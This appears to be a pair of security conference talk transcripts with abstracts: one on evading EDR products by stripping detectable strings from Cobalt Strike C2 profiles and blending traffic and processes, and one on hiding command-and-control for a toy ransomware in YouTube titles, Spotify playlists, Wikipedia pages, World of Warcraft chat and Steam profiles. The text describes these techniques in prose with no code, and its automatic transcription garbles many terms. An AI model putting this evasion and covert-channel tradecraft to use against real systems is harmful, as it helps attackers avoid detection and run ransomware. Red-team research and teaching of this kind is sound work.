the behavior or anything that's dropped or anything that happens is then correlated to behavioral or known attack techniques. And we should care about this because this is how the game is changing as we look at it. Fenders are learning from us. They're coming to our talks. They're reading our research. They're following whenever we come up with new techniques and then trying to figure a signature to detect it. And as we modify this, so do the IOCs. So if we are constantly evolving our tradecraft, we are circumventing those predefined IOCs that they're looking for. And once again, that can mouse game is occurring. And simply put, if we can do that further by extent by modifying how our C2 interacts, that's a great step ahead and keeping us always one step ahead of them. And simply put, threat actors are doing this with huge success. So I'd like to give an example. Using CobaltStrike, you know, C2 profile that didn't have beacon.dll stripped out. Fishing email that contained a payload when the user opened the file and enabled the macro, the shell code executed. It's great. The beacon called home, but anytime the command was executed, the EDR would block the payload. By simply stripping things out such as beacon and beacon x64 out of the profile and retrying again, the EDR did not catch on to this because it couldn't, it was looking for this and didn't see beacon.dll in memory. Therefore, it didn't have enough points of data to make the decision to terminate the process. That's just one example of what we can do for our C2 to manipulate it to avoid detection. Another one, once again, looking at those human, that human aspect, user agent strings. Now this only comes into play, you know, if you're using DNS based beacons, you don't really need to worry about a user agent. Also while we're on the subject, really good to avoid using TCP over the internet. Very odd, it sticks out. If you're going across the internet, HTTPS is the best. But oftentimes the user agent string can be a dead giveaway. If it's something that's odd or weird or doesn't look normal, sometimes that's an indication that there needs to be something to investigate. More mature companies can go as specific as looking at, well, we're a Firefox shop and then one day they start seeing Internet Explorer user agent strings. That stands out from the crowd. And that can be the point of an IOC that they can start investigating on. So with all of this in your mind, let's introduce a new tool I'll be releasing today called SourcePoint. SourcePoint is a tool that actually generates malleable C2 profiles for CobaltStrike. Using all these features, we kind of talk to it and more. It really ensures that each time you generate a profile, regardless if you put the same values in, the actual profile itself will be unique. So you can generate multiple profiles using the same values and they'll be unique from each other. There's over 15 different customization options in this tool alone for you to select. But if you choose to leave them blank, they'll be randomly selected for you. So you're always ensuring a high level of entropy. It does, you know, 15 options can seem daunting. So there is YAML support. So it's really good to use a YAML file. So you can always have kind of like your go-to sampling that you can start modifying. It is written in Go, but it's simply using a template-based language to generate these profiles. So some of the features it has, as I mentioned before by that user agent strength, there's over 60, ranging from Windows 10, Windows 10 Chrome, Windows 10 IE, Firefox, Server, Mac, Linux. You kind of get this picture. So there's a lot of them. Also, different options for a PE header. There's over 21 currently built into it. There are seven different types of profiles for your traffic to be shaped to. In right now, it does strip out 95 strings that, you know, EDRs use to look and detect shellcode, especially around your Cobalt strike. You can kind of see right here a large list of them. Now, usually the question I get is, well, there's options to obfuscate and encrypt. So why would I bother with this? Oftentimes, all that stuff gets down to the point that it's a great way to avoid detection, but at some point it needs to be read and interpreted by the system. So it has to be in an unencrypted state for it to be processed on the stack properly. And that's when those detection alerts can be triggered. So that's why going through this, I've looked through and found the common indicators of compromise, looking for commonalities and things that they would look for and just removing them. As I mentioned before, there is a lot of ramization. So the values for allocations on different features are always changing. Obviously, there's, you know, sleep, jitter, you know, your kind of standard things, but more interesting thing is the manipulation of injection-based strings. For post-ex, there's even 18 options. I like to also call, we can kind of see here, this is a great document or image. If you haven't had a chance, please go ahead, look at this. It is basically a parent relation process map of normal Windows processes and their parent and child processes. So with this, when we're talking about, you know, post-ex or any type of spawn-to processes, especially like execute assembly, we can actually map a process with a more realistic child process for spawning. It makes sense and it's harder to detect and it doesn't stand out as much. This tool source point has CDN support for anything that you need for CDN, depending on how you're setting up your C2, as well as allocation manipulation values. It also supports SSL certificates. So why use it? It's been development for several years. It's been deployed on hundreds of Red Team Ops prior to today's public release. The most important thing I would probably say is unique profiles. If you're taking something that is static or using something that's the same profile over and over again for multiple engagements, eventually you're going to get caught burnt, especially if you're basing it off as something that's public and you're not really modifying it extensively. Chances are other people are downloading it and doing the same thing. So having completely unique profiles really does aid and once again keeping one step ahead of blue teams. Another reason is it automates the process and reduces the basically overhead of building and stripping out these IOCs from your C2. My personal favorite is human error. People make mistakes. I often make them. That's why I developed this. It's that way I can do it once and have it automated. So I couldn't show an example template because it just run off the screen. We can be here for hours going through all the different features. But to kind of show you what the results are from C2 in it, you can kind of see right here how it looks, all the different features, what it's done, the transformations, everything like that, the values and how it just really blends in. So my final thoughts before we wrap up. We really need to, as red teamers, understand blue team and their procedures better. From that we can understand how they're detecting us, what we can do to go around those detections. Simply blue teamers are attending our talks. They're reading our research. Every time we publish something, they're reading it. They're learning it so that way they can fine tune their tradecraft to be better at detecting it. So we really need to do that. That's how this cat and mouse game is going to work and continuously continue. Lastly, at the end of the day, for us to be better red teamers, we need to start learning blue. So any questions? You can find the Scarecrow framework for bypassing EDRs and all that stuff for developing implants here. Sourceplant can be found on my GitHub along with the slides. If you have any questions or ever want to talk about this stuff, this is my passion, my bread and butter. I really spend a lot of free time doing this and learning and kind of advancing my own tradecraft. So if you ever have a question or want to talk, feel free to reach out to me on my Twitter, my GitHub. Before I wrap up today, I just want to say thank you for attending my talk. Have a great day.
Endpoint Detection and Response (EDR) have become the punching bags of the security world. Attackers employ sophisticated techniques to circumvent these controls and as a result, there has been a driving need for defenders to detect and prevent these attacks... but are they sufficient? This talk will go over all the operational considerations and tradecraft theory I've developed over the past few years when evading EDRs and other endpoint controls. This will primarily focus on techniques to ensure command and controls servers are not easily detected and contain virtually no Indicators of Compromise. This talk will then deep dive into the inner workings of the EDR bypassing framework ScareCrow,highlighting some of the lesser-known techniques and new features that are available to red teamers and pentesters. By the end of this talk, the audience should walk away with a detailed understanding of how to use ScareCrow and other opsec considerations to avoid being detected by endpoint controls and blue teams.
10.5446/54349 (DOI)
Welcome to our talk Everything is a situ if you are brave enough by Luis Angel Ramirez Mendoza and Mauro Eldridge from DC5411 Ok, before we start I would like to make a brief introduction about ourselves, the speakers, and about the topic of this talk, which is a rather crazy one Also I would like to take this chance to say that we are really happy to be here at the Adversary Village And that I really hope that you enjoy this talk as much as we have enjoyed making it, this was a really crazy thing for us I'm Mauro Eldridge, I'm from Argentina, I am the founder of DCA and DC5411, the DEF CON group that comprehends Argentina and Uruguay I spoke at different conferences before, including DEF CON a couple of times, and other conferences around the world including Russia, Brazil, Colombia, Iran, Spain, India, Pakistan, Panama, Peru, and there are more to come My co-speaker today is Luis Angel Ramirez Mendoza and he is going to introduce himself now Thank you Mauro, hello everyone, my name is Luis Angel Ramirez Mendoza, I am working on the hardware security engineering and building cyber art And member group DC5411, the speaker and different conference include DEF CON, Visayino Castle, and India, Visayislaman, Pakistan, Dragon Yard, Colombia, Creya USA, Jónico, Spain, Poccon, Iran, and Coesí, Peru Thanks Luis, so the topic of this talk, as I said before, is a rather crazy one, we are going to try to demonstrate the most crazy, unexpected, and you might call it interesting too, ways of setting up a situ server We are going to use different platforms, different online profiles, certain streaming platforms, gaming platforms, and even video games to try to build a situ server So, let me explain this, we try to make this talk as friendly as possible to every public, so we will explain from scratch all this topic, the construction and how to use a basic situ server And we are going to mutate this server to use different applications that are common to almost everyone here, so the point is that we will part from a really basic situ server and we will try to expand it to use different platforms For this, we have created a fake, a toy ramp server, which we will try to call home to leak some information, to coordinate and attack, this is an encryption operation, which we will see in a few that is not as dangerous as it seems And it will try to use the most crazy and unexpected ways to carry out these sections, to communicate these sections Just as a disclaimer, both the ramps on guard and the situ samples here are unable to deal any kind of damage to their targets, they have been built for educational purposes only and they can't deal any damage at all, not even accidentally These artifacts are not to be considered real world samples, they are merely illustrative, so some features that may be present on large scale real world tools or samples will be missing here, they won't be something implemented We haven't been involved in any kind of illegal activity, and it will be really hard to do so with these samples So, let's start with the introduction, let's take a first glance at a basic situ that we had built, and from now on, if you have never seen or if you have no idea of how a situ works, you will have the really basic knowledge to know what we are talking about And then this talk will go on more bizarre ways, and we'll start seeing some crazy things from now on So the obvious question here is what is a situ server? situ stands for common and control server, it's a server controlled by a bad actor, an attacker, which is used mostly to coordinate and distribute orders to infected systems These orders can carry out information leak, lateral movement, encryption operations, and almost anything that you can picture in your head This traffic, which is sent from an infected system to the common and control server, tends to be hidden, tends to try to blend itself among normal applications or among other kinds of traffic to disguise itself, because otherwise it will be really easy to identify it, to tag it, and to block it Now there are different connection models which won't be discussed here, because we are trying to build something really basic just to give an example, but there's not a single way on how the situ servers behave So for our example, we set up, as I said before, a really basic situ server and client, which will be able to do the following, to register a new victim, this is to identify correctly a new victim, to generate and share an encryption key in order to encrypt this victim Actually, this key won't be a real encryption key, it will be a public SSH key, which with the help of OpenSSL you can use to encrypt files and different things, but this is out of scope, we are not going to encrypt anything actually It will then try to leak information from the target and then encrypt the target's file system, which is the final objective of this malware, but actually we are not going to encrypt anything as I said before We will only leave a ransom note on the desktop asking for a payment, and something that we are not going to do yet is to disguise the traffic of this situ server using another well-known application or service or platform, not yet as I said before So it's crime time, and to make things funnier, to try to stick more to the real world, we will impersonate a new ransomware gang, we are going to be the Capybara gang, dedicated to stealing Capybara coins from unsuspecting victims Our ransom notes will ask for payment in Capybara coins exclusively, Capybara's art is friendly and nice looking lads that you can see in this picture, and are common to Brazil, Uruguay, and Argentina So a curious piece of information is that the Capybara coins are something real, they are actually fiat currency that are our official currency in Uruguay, and they feature one of these lovely lads, obviously that's enough and a valid reason to want all of them So, back to the technical field, our server will use Ruby and Sinatra for establishing an API Something that I must clarify here is that interpretal languages are not something common, and I risk to say that I don't think they are used at all on this kind of software, on this kind of malware But it will be way more understandable to use this than any other language for this talk, believe me We prefer to use Ruby because it may help us in building something minimal, a minimal artifact, and the language is quite understandable for almost anybody So we decided to stick to this rather than sticking to C or to any other language So let me explain the code really quick, we require common libraries like Sinatra and Colorize in order to be able to output Colorate output And the rest, NetHTDP and URI are part of the Ruby core So we define a password for our situ server because we don't want anybody snooping around and stealing our complex situ server We define some real basic endpoints addressing the previous data needs, how to reserve and assign an ID to HVIC team, how to generate a key payer for each of them Asking to leak specific information from the host, in this case it will only leak an IP address and a port, like sort of a connection string in order to get back from the server to the client And actually we are going to give an encrypt endpoint in order to notify that we are going to start encryption operations on a given client, again this is not going to encrypt anything And we have a last endpoint which will allow us to connect remotely to the compromised host, obviously using the information leak at before, the connection string that I mentioned We are going to query the telemetry endpoint and issue a Qstone command, in this case we only have the encrypt command, nothing else And obviously this will require a password because we don't want anybody stealing our precious situ server The client is pretty simple again, it will query the server endpoints in order to do everything that we had mentioned before, to register itself, to get a victim ID, to get a victim key, encryption key Also leaking the compromised host IP address and port in order to create this connection string that the server needs And then after running all this routine, it will place a ransom note once the server issues the encryption command Now let's see how things turn out and then once you have this base and that you have a good understanding of what we are going to keep here We are going to move to the Wackey or not so orthodox methods, so let's start with the demo Okay, as you can see here we have three different terminals, the one on the upper left is the situ server, it's going to run the capybara server This other terminal will send the encrypt command once that we have everything set and ready to go And the lower one is a docker container which as it says here, it's the victim So we will basically run the server, run the client on the victim side, the client will register itself and then when everything seems nice and smooth we are going to send the encrypt command from this terminal Let's make it roll Now it started on the 4567 port, we are going to launch the client on the victim Wait, oh, okay, now it should connect The exchange should happen real fast here, well as you can see, it already happened And it's already waiting, as you can see, for some input, the victim was generated We have generated the key payer, we have leaked the connection string, the house name and the connection string In this case it's a docker container, as I said before It will start running a listener on this port 1337, which is stated here in the connection string, and it will wait for the input Now we are going to send the encrypt command, the version is going to make a CUR roll, we are going to make a POST, order encryption and password adversary, as it says there This should be enough to start the encryption operation Okay, it's done, sending the encrypt order to all, attempting to encrypt this victim, fetching the endpoint And now if we go to the desktop, we should have a creepy ransom note, if everything went smooth Yeah, it's there, now what are these crooks up to, what do they want from us? Ah, I knew it from the start, they want our capybara coins Okay, that's how the basic C2 interaction works, now that you have seen how it behaves, we are going to move on to the not so orthodox methods Remember, this is a basic diagram once again of what we have done so far We have the client, which is the victim, the server, and the remote activator that can't reside inside the server itself if you want to So, let's move on to the fun part now, the walkie clients, how to hide situ traffic in the most unexpected, walkie, crazy ways that you can ever picture So what's next? So far, our C2 is able to do a couple of things Register a new victim, that's done, check, share an encryption key, check, look information from the target, check, encrypt, quote it The target's file system, check, and now we have something pending We have to disguise our traffic using some well-known applications, platforms, or service So, let's start doing that This was the original inspiration for this talk, why not rely on it or the naming calibration task for orchestrating or attack Using YouTube free APA, we decided to create a video named after the minimum CPU command, execute star, get key, lead info, create sqn, the content, nothing but the same frozen frame For hull and mini, we online car for the title, nothing else, no, the creation is set for get key for reason The claim with look to the video, which were pro-played order, and execute order when the target must an specific appender, existing video can be reviewed, and new video on Pudet is selling via YouTube APA This can be done in amphibian with minimal effort and for free So, let's see how things turn out here, and obviously if you like this video, don't forget to like and subscribe to our channel Give me a second, okay, as you can see we have here, this is another Docker container, it won't be long This is our channel, which is crowded with subscribers and a lot of people who are interested in our things That's why we have so much visits on our videos, and I apologize for the interface being in Spanish So, let's start, we will show that the root and desktop folders are empty That's our channel ID, which is what we query via the API, we have the different videos that mean different orders, they are in reverse order here So, let's go into some of the client, it found the channel, it found the videos, it already has access to read the titles, that's all it needs It doesn't need to watch the videos, it doesn't need to do anything else It only asks for each one of these videos titled and the description only when it needs the SSH key here, which is on the get key video That's right, there it is, it will take this description field and use it as a real encryption key Now, let's see what these groups are up to, they have, once again, Hackadus Okay, so that's it for the YouTube client, this is a summary of how it works, it's quite simple Remember that all of these samples will be available at GitHub after the talk, so don't worry about it if you want to test them The only thing is that you will have to issue your own API keys, but that's not a problem, it's pretty easy to do So, now let's move on to another client, the Spotify client, I think almost all of us know Spotify We have been using their platform free API to craft a special playlist that you can see here The official Capybarra Gang playlist, the title of this playlist is quite fishy, quite suspicious, but this hasn't been varnished so far so we're going to leave it as is It's composed of four different sections, the first one is the wake word, hits, the second one is a dash-separated IP address for the situ server And the third and fourth are pieces of the encryption key, you might ask, why are you storing them there? Well, the description box contains the rest of the key, but it's split it due to the length limitations that it has, that the field has So we have to resort to this creative way of doing things, which in turn seems to be a little bit messy, but it works The playlist is made up of different songs, obviously, but the important thing about these songs is their title Their title verbally represents one of the comments to be executed Here we have added a couple of new comments because this is a newer client that had been a little bit further developed So SovaLive from Loban Rockets is the sequence start, fix from the Sisters of Mercy is the comment to fix the key to start exchanging the keys and to reassemble the key They can switch from KMFDM, it's leak information, thang from Jogo Kano and the sit-bolts is a start encryption or start the attack Adios from KMFDM, it's sequence end Then we have added this as a special case I started something that I could finish from the smiths, actually means that we have interrupted jobs And as the smiths once again is wait These comments were briefly implemented for having mined special needs from other users So this is how the playlist will look, take a look at this SovaLive will be reflected here, sequence start I started something I couldn't finish, we'll say warning, some previous jobs were interrupted Fix, we try to recover the key Thang, we'll start the encryption cycle Adios, which means goodbye in Spanish, will be the sequence end So let's move on to the demo in order to see this in action because it may seem a little bit crazy now but it's quite simple Ah, before I forget As with the YouTube client, these songs can be added and removed really easy using the platform's API This goes minimal forth, it's really fast and free So let's see now how things turn out and if you like our musical taste join the official Copy Bar again playlist Okay, again we have the container, you know the Docker container which is going to be the eternal victim We have this playlist with these eight songs, let's see how they behave It has already found our user and everything went really fast and smooth We have found the tainted playlist, we started reading the comments so we'll add The situation is recovered from the playlist title, the key is recovered from the title too There are some unfinished jobs here, some interrupted jobs Fix have already recovered the key and it looks to be good Remember that it's splitted on three parts Now okay, this is from the description field Now don't have information to leak, remember this is a dummy comment We started the encryption cycle which will only leave this note Two shadows is another comment that had been dropped from John Love's Jesse Ball which will try to delete shadow copies As the lead will wait and Adios will send obviously a sequence hand Now what happens is if I delete two shadows as a lead and I started something from Morise This is to show that this happens in real time, the client will read the comments in real time As you can see now there are no interrupted jobs, nobody is waiting for anything Also we don't have the shadow delete command, the two shadows on Now oh no, we have this strange file here and somebody is asking for capybara coins Oh man, okay, I think it's time to move on to another client So this is the final summary, as you can see different songs mean different comments So it's worth to give it a try Now let's move to the next one, Wikipedia client You can use Wikimedia's free API to query any article on Wikipedia or being real here any other Wikimedia instance After you register your user it is possible to delete its profile page and add almost anything that you can imagine Once generated this is a special entry which is considered to be an article and can be queried via API It will have the form of user and your username So as we don't want to disturb a project like Wikipedia we have only edited my own profile and we have only done one API query to read it once so there won't be a live demonstration of this client Also we try to discourage any user to start using Wikimedia to make testings As you can see that's my own page, you have sequence start, let me tell you a secret, whatsup, do it and sequence end Then we have a special client which will connect to the Wikimedia's API, will fetch a specific tainted user which in this case is mine They will try to recover the comments from the page and parse them, we have sequence start, we have received the key There is some information to link from our site, start an encryption cycle and receive a sequence end, that's it Again this page has been reverted as it's my own profile on Wikipedia We try to encourage if you want to test this to raise your own Wikimedia server, it's quite easy to do it via Docker or virtual instance or whatever you want But it's worth to give it a try on a private instance So the next one, here is when we start doing some way tracer things We say why not try World of Warcraft or any other role game And we say ok, why not give it a try We are using Trinity Core which is an awesome project, an awesome project which is a private World of Warcraft server emulator Which you can use to easily create your own situ instance Now you might say wait, how are you going to use this game maliciously? And as you can see on the picture on the right, it's something that you can ask but you know the answer, we have done it After creating a character, the player can build any Q-Stone macros and also run minified Lua scripts But bear in mind that the banded Lua version of World of Warcraft does not provide access to same time core functions like operating system operations or networking operations So you will be more or less caged inside the game So this may be something that we can still use in our favor As you can see now These macros and scripts can run almost anything that you can do with your keyboard and mouse I can say for sure if it can run everything but so far it was able to do everything we needed So we could easily automate the flow of our situ routine in a very friendly and a very easy way So we have created the Capybara macro that you can see on the right with that cute paw But it will only click certain buttons, we can make it click on an action bar, an action button But this is the question, what do we want to do with those buttons? So we started figuring out how we could start building short functions because as you can see on the lower part of the screenshot to the right We have used 126 characters out of 255 Which is pretty short, pretty short to build something on a comfortable way So we have to rely on a lot of creativity here in order to do minimalistic things which will be tied together So after a little research and a lot of tampering we have been able to create our level 14 hacker Which is really to claim back Warzone Gulch or take part in a ride As you can see this is the hackers tool bar, the hackers skills And now you might say ok but how are you going to distribute these commands or these skills? Luckily, and this is some old information but we have discovered it just a few days ago Trinity Core provides a way of logging all of our chat inside the server All the chat that goes on the server during each server session So using the chat function seemed like a nice idea and the right way to do things Now we say ok, we have the chats, we have them recorded on a file But now we need to distribute them, we need to filter them We don't want any player saying ok send this command there, send this command here So we need to have a way to filter all of this and publish all of this As you can see in this screenshot we were able to pipe our chats to a file And we were tailing that file inside Unix, so far so good But this isn't going anywhere still, yet we are not going anywhere with this So we have the chat, I was able to parse them, I was able to filter them only by Drake, my player Which is in no way a reference to Francis Drake the pirate And we say ok now we have to pipe that very same file, that log file somewhere We have to publish them over the network So the next point is to distribute the chat messages with Sinatra That's it, 8 lines of code and we can do it in way less I think But we wanted to keep the code as friendly as possible We are only going to read the last 10 entries from the chat log every time somebody requests that endpoint I know this is not the best way to do things, we can also stream the file but this will do for now So now let's start the demo and let's participate in a ride This will be a little bit longer than the other videos Give me a second, ok Now let me pause here, we are somewhere around Westfall here We have three terminals here, we have the first one which is C2 They have made it a little bit smaller because this is a really crowded window We have the chat log monitor here which will be tailing the chat log file And obviously the eternal victim, this poor Docker container which will receive again all the hits We have our macros here and our action bar, let's roll Ok, we'll start by turning on the copy bar server, ok, Awaiting Connections Now we are going to tail the file constantly so everything will be streamed here Ok, these are the dots that I sent to the file before And the victim will wait for a couple seconds now, this is the Capybara Ramson Warrs E2 Which will click sequentially on all of these little macros or Lua scripts that are laying around here We have the encrypt, get key, leaking fault, reroll key, reroll server if available, sequence end, sequence start and set key So now this will happen real quick, take a look at the chat window Once I click here, the window will be crowded automatically Ok, now this is already piped there, the client will look only for things that Drake saved Now the client will connect to the server, the server will stream the file or actually takes a couple of lines And boom, this already happened as we were talking, the Docker container connected The host won't be enrolled, that's something that we have clarified before, it's just a dummy function And your files are encrypted, Ramson node is once again present I think we should consider a cyber insurance company right now Ok, that's enough, and wait, I shouldn't go so fast Yeah, that should do So, let's move on The same client, this is by far the trickiest one We weren't really able to do a lot of things with Steam's API, which turned out to be really restrictive Almost to the point on thinking that we should leave that behind and use another thing But luckily we found a workaround, we decided on using the player profile page as a starting point Because the API wasn't leaving us anywhere, so once we jumped into using this profile page We found that we don't have a lot of fields, a lot of space to store things like a key or a situ address So we started once again thinking on a possible workaround for this And we found that the optional field, real name, could be handy on this case As you can see here, this is quite a strange real name I can tell you for sure that in Argentina we don't use so complicated names So you are ok if you think that this is something fishy As I said, pretty strange name, right? So the content of this field actually represents two different pastes on Pastebin The first contains the situ address and the second one contains the key Now by reading the player profile via API, we have no information to start, but how do we issue commands? We are out of space, we don't have a lot of things to modify here and using commands here will be something pretty hard to implement So we decided to support two different modes on this client Games and friends By using the games mode, the situ administrator can map a list of games owned by that account we are using, when the profile we are using, we can map those games to a list of situ commands Each game can represent a command and can be listed and delisted from the profile at will But this is not an easy process, let me tell you By using the friends mode, the situ administrator can map this list of friends to a list of commands Now each friend becomes a possible situ command Again, friends can be removed and added at will But again, we discourage the use of this one specifically since both modes are not easily maintained and my encoding bands seems pretty restricted with bands, at least on us So creating multiple accounts or using this for experimenting can turn your account into something uniscible So take care of... As you can see, we have here a list of my friends, which are not quite a lot actually So I map each one of them, you can see this in line 41 which is commented Each one is mapped to a command We start reading things and you can see that it says, ok, I found a baseming clue, this one I'm searching for the encryption key there and I found it Now, they have found another baseming clue, I'm searching for the situ IP there, I found it And then, it's trying to start the routine Let's see how the games mode works Warhammer seems to be the sequence start, LEGO set key, Kingdom Rush, Lake Info, Darkest Dungeon, Script Start Another Warhammer is sequence end This will be exactly the same behavior, it will start to look for the IP address, encryption key, or baseming But it will use the games as a list of commands Now, the problem is that certain games are paid, so it now supports free games too But again, Steam APIs is a little bit restrictive, so you have to explicitly ask for listing free games So as you may see, this is the most wacky one so far Let's see a demo about it Give me a second, once again Ok, this is my profile, the basemings As you can see, one contains the key, the other one contains a plain IP address Which are listed as my real name You can judge me by the games I play, please Now we're going to start using the method friends We're starting the commands Again, this is the baseming, this is the other baseming And it will help place it already the ransom note Let me check Yeah, it did Oh man, not these guys again So, this was the last client we have to show today And sadly, it's time to go We are really happy to be here today at the Adversa de Villeges We have really enjoyed doing this talk, creating this talk and researching these crazy topics And we really hope that you have enjoyed it too So, let's jump to the conclusions and the Q&A Our conclusions are simple, these examples do not pose a real world danger But they can easily be used to be able to do so, with a little bit of tweaking When talking about traffic, never assume what might seem to be normal traffic To encyclopedias or streaming services could be hiding something else Sometimes on plain sight, sometimes a little bit more complex, like more cryptic way Like the Spotify client I showed you And if you want to build a nice hacker in World of Warcraft, use Ro plus engineering Which are pretty nice choices If you are brave enough, anything can be a C2 Don't be afraid to reach out on Twitter or on GitHub We are always working on crazy things, mostly on hardware hacking projects But sometimes we jump to software like we did today So, get in touch, don't be afraid to approach We are going to publish this on GitHub So, feel free to clone, the only thing you need to do yourself is to get your API keys Because we are not going to obviously upload hours So, we really hope you enjoyed this And we want to thank all the adversary village team for inviting us today If you have any questions, we are happy to discuss them at the Discord server Thank you!
It is truly amazing how many and diverse methods an attacker has to "call home", exfiltrate information, or coordinate the next steps in his chain of attack. In this talk we will demonstrate (and automate) the most wacky, unexpected, and interesting methods for setting up a C2 server: Messaging apps? social media profiles? video games or gaming platforms? Yes, and there's more. The more sacred and innocent an app appears to be, the higher the score for us when weaponizing it. We will explain from scratch the function, the construction and even the automation with Ruby and Python of C2 servers based on a wide range of applications of common and daily use. For this we will use a fake toy ransomware, which will try to call home, exfiltrate information and coordinate an attack in the most crazy,bizarre and above all ... unexpected ways. Lots of short demos make this talk suitable to both newcomers and experienced people.